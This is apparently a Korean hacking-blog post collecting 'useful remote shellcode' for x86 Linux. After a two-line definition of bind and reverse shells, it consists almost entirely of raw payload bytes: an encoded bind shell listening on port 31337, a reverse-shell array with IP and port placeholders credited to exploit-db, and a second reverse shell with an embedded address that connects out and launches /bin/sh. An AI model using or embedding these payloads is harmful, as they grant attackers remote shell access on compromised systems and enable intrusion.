유용한 쉘코드(원격)
바인드쉘 : 공격당하는 서버의 다른 포트를 열어 쉘을 띄우는 것
리버스쉘 : 공격자의 열려있는 포트로 서버가 접속하도록 하는 것
131byte bindshell code, bind port:31337
"\xeb\x11\x5e\x31\xc9\xb1\x6b\x80\x6c\x0e\xff\x35\x80\xe9\x01\x75\xf6\xeb\x05\xe8\xea\xff\xff\xff\xe5\x7b\xbd\x0e\x02\xb5\x66\xf5\x66\x10\x66\x07\x85\x9f\x36\x9f\x37\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xfb\x87\x9d\xf0\x37\xaf\x9e\xbe\x16\x9f\x45\x86\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\x87\x8b\xbe\x16\xe8\x39\xe5\x9b\x02\xb5\x87\x87\x8b\xbe\x16\x33\xf8\xe5\x9b\x02\xb5\xbe\xf8\x66\xfe\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x76\xe5\x74\x02\xb5\x87\x9d\x64\x64\xa8\x9d\x9d\x64\x97\x9e\xa3\xbe\x18\x87\x88\xbe\x16\xe5\x40\x02\xb5"
리버스쉘 https://www.exploit-db.com/exploits/25497/
unsigned
char
code[] =
"\x31\xc0\x31\xdb\x31\xc9\x31\xd2"
"\xb0\x66\xb3\x01\x51\x6a\x06\x6a"
"\x01\x6a\x02\x89\xe1\xcd\x80\x89"
"\xc6\xb0\x66\x31\xdb\xb3\x02\x68"
IPADDR
"\x66\x68"
PORT
"\x66\x53\xfe"
"\xc3\x89\xe1\x6a\x10\x51\x56\x89"
"\xe1\xcd\x80\x31\xc9\xb1\x03\xfe"
"\xc9\xb0\x3f\xcd\x80\x75\xf8\x31"
"\xc0\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\x52\x89\xe2\xb0\x0b\xcd"
"\x80"
;
shellcode=\
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89\xe1\xb0\x66\xcd\x80"+\
"\x93\x59\xb0\x3f\xcd\x80\x49\x79\xf9\x68\x0a\xd3\x37\x02\x68"+\
"\x02\x00\x10\xe1\x89\xe1\xb0\x66\x50\x51\x53\xb3\x03\x89\xe1"+\
"\xcd\x80\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3"+\
"\x52\x53\x89\xe1\xb0\x0b\xcd\x80"
'Pwnable!!' 카테고리의 다른 글
procfs_search.h 사용하기 (0) | 2018.03.17 |
---|---|
fgets과 socket에서 0x00 (0) | 2018.03.08 |
유용한 쉘코드(x86 Shellcode 로컬) (0) | 2018.02.11 |
[인프라] 리눅스 강의 (생활코딩) (0) | 2017.07.05 |
[맛보기]시스템 해킹 (0) | 2017.03.28 |